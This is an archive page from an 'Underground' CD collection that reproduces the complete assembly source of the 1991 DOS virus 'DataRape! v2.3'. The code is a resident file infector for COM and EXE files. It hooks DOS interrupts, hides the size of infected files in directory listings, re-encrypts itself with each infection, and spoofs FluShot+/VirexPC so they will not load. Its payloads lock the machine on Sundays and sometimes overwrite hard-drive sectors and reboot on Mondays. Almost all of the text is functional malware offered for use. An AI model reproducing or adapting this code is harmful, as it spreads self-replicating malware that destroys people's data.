Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / zrodla / d / dtarpe23.asm < prev next >

Wrap

Assembly Source File | 1998-01-14 | 31.0 KB | 1,109 lines

@b macro char mov ah,0eh mov al,char int 10h endm ;--- ; DataRape! v2.3 Source Code ; ; Written by Zodiac and Data Disruptor ; ; (C) 1991 RABID International Development Corp ; (Aug.14.91) ;--- ; ; Note: Assuming that and infected COMMAND.COM was booted, FSP/VirexPC will ; not be able to go resident under this version of DataRape! ; ;--- code segment assume cs:code,ds:code,es:code v: ; All Pre-Resident Offsets Based ; upon this location startup: call relative relative: pop si sub si,offset relative mov bp,si cld push ax ; push es ; Saves registers push si ; push ds ; mov ah,2ah ; Get system time int 21h cmp al,0 jne are_we_here_boost jmp its_sunday are_we_here_boost: jmp are_we_here ;--- ; If it's Sunday, then we display a message and lock the system ;--- its_sunday: mov ah,01h mov cx,2020h int 10h ;NUL the cursor mov ah,02h ;Moves the cursor xor dx,dx int 10h xor ax,ax ;Clears the screen int 10h @b "I" @b "t" @b "'" @b "s" @b " " @b "S" @b "u" @b "n" @b "d" @b "a" @b "y" @b "." @b " " @b "W" @b "h" @b "y" @b " " @b "a" @b "r" @b "e" @b " " @b "y" @b "o" @b "u" @b " " @b "w" @b "o" @b "r" @b "k" @b "i" @b "n" @b "g" @b "?" @b 13 @b 10 @b "T" @b "a" @b "k" @b "e" @b " " @b "t" @b "h" @b "e" @b " " @b "d" @b "a" @b "y" @b " " @b "o" @b "f" @b "f" @b " " @b "c" @b "o" @b "m" @b "p" @b "l" @b "i" @b "m" @b "e" @b "n" @b "t" @b "s" @b " " @b "o" @b "f" @b " " @b "R" @b "A" @b "B" @b "I" @b "D" @b 7 im_looped: jmp im_looped are_we_here: mov ax,6969h ; Check to see if we are int 21h ; Allready resident cmp bx,6969h je already_here ; Yes? Then leave the program jmp after_trish db 13,10,'Patricia Boon',13,10 after_trish: xor ax,ax ; mov ds,ax ; Loads Current les ax,ds:[21h*4] ; Int 21h Vector mov word ptr cs:[si+save_int_21],ax ; mov word ptr cs:[si+save_int_21+2],es ; push cs pop ds jmp load_mem already_here: pop es ; If, exit go_go_program: ; jmp go_program ; exit_exe: mov bx,es ; add bx,10h ; E add bx,word ptr cs:[si+call_adr+2] ; X mov word ptr cs:[si+patch+2],bx ; E mov bx,word ptr cs:[si+call_adr] ; mov word ptr cs:[si+patch],bx ; E mov bx,es ; X add bx,10h ; I add bx,word ptr cs:[si+stack_pointer+2] ; T mov ss,bx ; I mov sp,word ptr cs:[si+stack_pointer] ; N db 0eah ; G patch: ; dd 0 ; ; Below should be changed to: ; exit_com: xor bx,bx ; push bx ; mov di,100h ; push di ; add si,offset my_save ; movsb ; movsw ; ret exit_com: mov di,100h ; EXIT add si,offset my_save ; COM movsb ; movsw ; xor bx,bx ; push bx ; jmp [si-11] ; ;--- ; Here is where we load ourselves into memory ;--- load_mem: pop es mov ah,49h ; Release memory int 21h mov bx,0ffffh ; Set memory for FFFFh ; paragraphs mov ah,48h ; Allocate memory for ; ourselves int 21h sub bx,(top_bz+my_bz+1ch-1)/16+2 jc go_go_program mov cx,es stc adc cx,bx mov ah,4ah ; Modify memory allocation int 21h mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1 stc sbb es:[2],bx push es mov es,cx mov ah,4ah int 21h mov ax,es dec ax mov ds,ax mov word ptr ds:[1],8 call mul_16 mov bx,ax mov cx,dx pop ds mov ax,ds call mul_16 add ax,ds:[6] adc dx,0 sub ax,bx sbb dx,cx jc mem_ok sub ds:[6],ax ; This section look familiar? mem_ok: pop si push si push ds push cs xor di,di mov ds,di lds ax,ds:[27h*4] mov word ptr cs:[si+save_int_27],ax mov word ptr cs:[si+save_int_27+2],ds pop ds mov cx,offset aux_size rep movsb xor ax,ax mov ds,ax mov ds:[21h*4],offset int_21 mov ds:[21h*4+2],es mov ds:[27h*4],offset int_27 mov ds:[27h*4+2],es mov word ptr es:[filehndl],ax pop es go_program: mov ah,30h ; Get DOS version number int 21h cmp al,4 ; jae check_date ; If >= 4 then check the date jmp no_fry ; NOT?! Then continue with ; virus check_date: mov ah,2ah ; Get system time int 21h cmp al,1 ; Is it a monday? je randomizer jmp no_fry ;--- ; If we actually get here, then we have a one in 15 chance that we will fry ; the hard-drive. You may ask yourself, "Why do you go through all the ; trouble?". Easy, because the main priority here is spreading, and not ; fucking up data... ;--- randomizer: mov ah,2ch ; Get system time int 21h and dl,0fh or dl,dl jnz no_fry jmp write_short no_fry: pop si ; Restore registers pop ds pop ax cmp word ptr cs:[si+my_save],5a4dh ; Is it an EXE file? jne go_exit_com ; No? Then must be a COM file. jmp exit_exe ; Yes! Exit an EXE file go_exit_com: jmp exit_com int_27: pushf ; Allocates Memory, call alloc ; So TSR can load popf ; jmp dword ptr cs:[save_int_27] ; ;--- ; This routine will return our ID byte in BX if we are resident. ;--- weare_here: popf xor ax,ax mov bx,6969h ; ID Register iret int_21: push bp mov bp,sp push [bp+6] popf pop bp ; Set Up Stack pushf ; Save Flag cld cmp ax,6969h je weare_here cmp ah,11h ; Hide In jb not_hide ; Directory cmp ah,12h ; Listing ja not_hide ; fcb_find: call dword ptr cs:[save_int_21] push ax push bx push ds push es pushf cmp al,0FFh je done_hide ; Not There? mov ah,2Fh int 21h ; Get Size push es pop ds cmp byte ptr es:[bx],0FFh ; Extended FCB? jne not_extended add bx,7 not_extended: mov ax,es:[bx+17h] and ax,1Fh cmp ax,1Fh ; Check Time Stamp ;-- ; Checking to see if the file is with a 62 seconds filestamp... ;-- jne done_hide ; No? Then the file is not ; infected. Leave it alone... ;-- ; If we get here, then we've deduced that the file is indeed infected. ; Therefore, we must reduce the filesize from the DTA in order to show that it ; is "not infected" ;-- sub word ptr es:[bx+1Dh],offset top_file sbb word ptr es:[bx+1Dh+2],0 ; Decrease Size ;--- ; Finished hiding, restore the resigers we saved, and return to the INT ; whence we came from... ;--- done_hide: popf pop es pop ds pop bx pop ax iret ;-- ; Function differentiation happens here... ;-- directory: jmp fcb_find weare_here_boost: jmp weare_here ;--- ; If FluShot+ or VirexPC are trying to go resident, then tell them that ; we "allready are" resident ;--- fsp_trying: popf mov ax,101h ;Set FSP/Virex ID byte iret not_hide: cmp ax,0ff0fh je fsp_trying cmp ah,3ch ; Are we creating a file? je create cmp ah,3dh ; Open file handle? je touch cmp ah,3eh ; Are we closing a file? je close cmp ah,43h ; Get/Set file attributes? je touch cmp ax,4b00h ; Are we executing a file? je touch cmp ax,6969h ; Checking if we are resident? je weare_here_boost cmp ah,5bh ; Creating a file? jne not_create create: cmp word ptr cs:[filehndl],0 jne dont_touch call see_name jnz dont_touch call alloc popf call function jc int_exit pushf push es push cs pop es push si push di push cx push ax mov di,offset filehndl stosw mov si,dx mov cx,65 move_name: lodsb stosb test al,al jz all_ok loop move_name mov word ptr es:[filehndl],cx jmp all_ok touch: jmp try_infect all_ok: pop ax pop cx pop di pop si pop es go_exit: popf jnc int_exit close: cmp bx,word ptr cs:[filehndl] jne dont_touch test bx,bx jz dont_touch call alloc popf call function jc int_exit pushf push ds push cs pop ds push dx mov dx,offset filehndl+2 call do_file mov word ptr cs:[filehndl],0 pop dx pop ds jmp go_exit not_create: cmp ah,3dh je touch cmp ah,43h je touch cmp ah,56h jne dont_touch try_infect: call see_name jnz dont_touch call do_file dont_touch: call alloc popf call function int_exit: pushf push ds call get_chain mov byte ptr ds:[0],'Z' pop ds popf dummy proc far ; This is absolutely ret 2 ; needed, IRET dummy endp ; doesn't cut it see_name: push ax push si mov si,dx ;-- ; Here's a crude yet effective way of scanning the file handle in order to see ; what type of file it is... ; ; (NOTE: We make up for crudeity later by checking the first two bytes of the ; file to see if it is a COM or EXE file (4d5a)) ;-- scan_name: lodsb test al,al jz bad_name cmp al,'.' jnz scan_name call get_byte mov ah,al call get_byte cmp ax,'co' jz pos_com cmp ax,'ex' jnz good_name call get_byte cmp al,'e' jmp short good_name pos_com: call get_byte cmp al,'m' jmp short good_name bad_name: inc al good_name: pop si pop ax ret get_byte: lodsb cmp al,'C' jc byte_got cmp al,'Y' jnc byte_got add al,20h byte_got: ret function: pushf call dword ptr cs:[save_int_21] ret do_file: push ds push es push si push di push ax push bx push cx push dx xor cx,cx mov ax,4300h call function mov bx,cx and cl,0feh cmp cl,bl je dont_change mov ax,4301h call function stc dont_change: pushf push ds push dx push bx mov ax,3d02h call function jc cant_open mov bx,ax call disease mov ah,3eh call function cant_open: pop cx pop dx pop ds popf jnc no_update mov ax,4301h call function no_update: pop dx pop cx pop bx pop ax pop di pop si pop es pop ds ret disease: push cs pop ds push cs pop es mov dx,offset top_save mov cx,18h mov ah,3fh int 21h xor cx,cx xor dx,dx mov ax,4202h int 21h mov word ptr [top_save+1ah],dx cmp ax,offset top_file sbb dx,0 jc stop_infect mov word ptr [top_save+18h],ax mov ax,5700h int 21h ; Check if Infected and cx,1Fh cmp cx,1Fh je stop_infect xor cx,cx xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h adc dx,0 je fuck_it stop_infect: ret fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dx fuck_it: mov ax,5700h int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file mov ax,100h jmp short set_adr exe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h] set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save movsb movsw copy_body: xor si,si mov di,offset body mov cx,offset top_file rep movsb ; Copies virus ; body to buffer enc_body: mov si,offset body mov di,si ;************************** ;* CHANGE ENCRYPTION BASE * ;************************** mov ah,2Ch ;Get system time int 21h mov byte ptr [enc_base_1],dl mov byte ptr [body-v+enc_base_2],dl ;**************************** ;* CHANGE ENCRYPTION METHOD * ;**************************** call yes_no jc ror_rol rol_ror: mov ax,0C0C8h jmp short set_method ror_rol: mov ax,0C8C0h set_method: mov byte ptr [enc_meth_1],ah mov byte ptr [body-v+enc_meth_2],al ;******************************* ;* FLIP SOME REGISTERS, PART 1 * ;******************************* call yes_no jc es_ds ds_es: mov ax,1F07h jmp short set_pops es_ds: mov ax,071Fh set_pops: mov byte ptr [body-v+pop_1],ah mov byte ptr [body-v+pop_2],al ;******************************* ;* FLIP SOME REGISTERS, PART 2 * ;******************************* ;--- ; Zodiac has informed me that there is an error in the following routine ; he has advised me to coment it out until he fixes the bug ;--- ; call yes_no ; jc di_di_si ;si_si_di: ; mov ax,5EEEh ; mov dl,0F7h ; jmp short set_switch ;di_di_si: ; mov ax,5FEFh ; mov dl,0FEh ;set_switch: ; mov byte ptr [switch_1],ah ; mov byte ptr [switch_2],al ; mov byte ptr [switch_3],dl ;******************************* ;* FLIP SOME REGISTERS, PART 3 * ;******************************* mov al,56h call yes_no jc set_push inc al set_push: mov byte ptr [push_1],al ;******************************* ;* FLIP SOME REGISTERS, PART 4 * ;******************************* call yes_no jc set_dl set_dh: mov ax,0B6F1h mov dl,0C6h jmp short set_inc set_dl: mov ax,0B2D1h mov dl,0C2h set_inc: mov byte ptr [inc_1],ah mov byte ptr [inc_2],al mov byte ptr [inc_3],dl ;******************************* ;* FLIP SOME REGISTERS, PART 5 * ;******************************* call yes_no jc ds_ax ax_ds: mov ax,1E50h mov dx,581Fh jmp short set_push_2 ds_ax: mov ax,501Eh mov dx,1F58h set_push_2: mov word ptr [push_2_1],ax mov word ptr [push_2_2],dx db 0B2h enc_base_1: db 00h ; General ENC Base mov cx,offset un_enc enc_loop: lodsb push cx mov cl,dl inc dl ;--- ; What is the meaning of this??? ;--- db 0D2h enc_meth_1: db 0C0h pop cx stosb loop enc_loop ; Encrypto mov dx,offset body mov cx,offset top_file mov ah,40h int 21h ; Write Body jc go_no_fuck xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] ;****** Below Sets the JMP so to go to the Unencryption Portion of the Virus ;****** This Doesn't happen when this is first compiled, an infection ;****** Needs to occur add ax,un_enc-v-3 ;****** mov word ptr [top_save+1],ax mov cx,3 jmp short write_header go_no_fuck: jmp short no_fuck_boost yes_no: push ax mov ah,2Ch ;Get system time int 21h pop ax ;Save AX test dl,1 ;Are the 100ths of seconds 1 jpe set_yes ;If parity is equal, SET_YES set_no: clc ;Clear carry flag ret set_yes: stc ;Set carry flag ret jmp do_exe no_fuck_boost: jmp no_fuck ;--- ; Construct the .EXE file's header ;--- do_exe: mov ax,word ptr [top_save+8] call mul_16 not ax not dx inc ax jne calc_offs inc dx calc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx ;****** Below Sets the Calling Address to the Unencryption Portion of the ;****** Virus This Doesn't happen when this is first compiled, an infection ;****** Needs to occur mov word ptr [top_save+14h],un_enc-v ;****** mov word ptr [top_save+16h],ax add ax,(offset top_file-offset v-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc ax update_len: mov word ptr [top_save+4],ax mov cx,18h write_header: mov dx,offset top_save mov ah,40h int 21h pop dx pop cx and cx,0FFE0h or cx,1Fh jmp short time_got ; Mark Time Stamp db 13,10,"Free Flash Force!!!",13,10 no_fuck: pop dx pop cx time_got: popf jc stop_fuck mov ax,5701h int 21h stop_fuck: ret alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ret get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bx next_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret mul_16: mov dx,10h mul dx ret kill: call kill_rel kill_rel: pop si jmp write_short re_do: mov byte ptr [sector],1 ; Reset sector count to 1 inc byte ptr [track] ; Increment next track jmp fuck_drive ; Fuck it... ;--- ; This routine is very nasty!!! ;--- write_short: push cs pop ds cmp byte ptr [track],40 jae reboot cmp byte ptr [sector],9 ja re_do fuck_drive: mov ah,03h ; Write disk sectors mov al,9 ; Xfer 9 sectors mov bx,offset header ; Set for buffer mov ch,byte ptr [track] ; Set for track [track] mov cl,byte ptr [sector] ; Set for sector [sector] mov dh,0 ; Set for head 0 mov dl,2 ; Set for first fixed drive int 13h inc byte ptr [sector] jmp write_short ;--- ; This code will cold boot the CPU with a memory check ;--- reboot: mov ax,0040h mov ds,ax mov ax,07f7fh mov ds:[0072],ax db 0eah,00h,00h,0ffh,0ffh ; JMP FFFF:0000 header db "------------------",13,10 db " DataRape! v2.2 ",13,10 db " By Zodiac ",13,10 db "and Data Disruptor",13,10 db " ",13,10 db " (c) 1991 RABID ",13,10 db "Int'nl Development",13,10 db " Corp. ",13,10 db "------------------",13,10 greetings db 13,10 db "Greetings to The Dark Avenger, Tudor Todorov, Patricia Hoffman",13,10 db "(Get your articles correct for a change... Maybe we should write",13,10 db "for you...), John McAfee (Who wouldn't be where he is today if it",13,10 db "were not for people like us...), PCM2 (Get your ass back in gear dude!)",13,10 db "ProTurbo, MadMan, Rick Dangerous, Elrond Halfelven, The Highwayman,",13,10 db "Optical Illusion, The (Real) Gunslinger, Patricia (SMOOCH), The GateKeeper,",13,10 db "Sledge Hammer (Let's hope you don't get hit by this one 3 times), Delko,",13,10 db "Paul 'Jougensen' & Mike 'Hunt' (And whoever else was there to see Chris & Cosy)",13,10 db "the entire Bulgarian virus factory, and any others whom we may have missed...",13,10 db " Remember: Winners don't use drugs! Someone card me a lifesign though...",13,10 db 13,10 db "(c) 1991 The RABID International Development Corp." call_adr: dd 100h stack_pointer: dd 0 my_save: int 20h nop ;**** UnEncryption Below un_enc: call enc_rel enc_rel: pop si rel_sub: sub si,offset enc_rel ;--- ; Note: These are the only bytes which are constant throughout any infection ;--- rel_copy: mov di,si push_1: push si push_2_1: push ax push ds push es push cs pop_1: pop ds;- push cs pop_2: pop es;- ;--- ; The constant bytes end here. (There are only 10 bytes...) ;--- inc_1: db 0B2h enc_base_2: db 00h mov cx,offset un_enc un_enc_loop: lodsb push cx db 88h inc_2: db 0D1h db 0D2h enc_meth_2: db 0C8h db 0FEh inc_3: db 0C2h pop cx stosb loop un_enc_loop pop es push_2_2: pop ds pop ax ret sector db 1 ; Count of sectors that have been fried track db 0 ; Count of tracks that have been fried top_file: save_int_21 equ $ save_int_27 equ save_int_21+4 filehndl equ save_int_27+4 filename equ filehndl+2 aux_size equ filename+65 top_save equ filename+65 body equ top_save+1Ch top_bz equ top_save-v my_bz equ top_file-v switch_1 equ enc_rel switch_2 equ rel_sub+1 switch_3 equ rel_copy+1 ;dta equ aux_size ; dta_attr equ dta+21 ; dta_time equ dta+22 ; dta_date equ dta+24 ; dta_size_lo equ dta+26 ; dta_size_hi equ dta+28 ; dta_name equ dta+30 ; code ends end ;-- ; End of virus ;--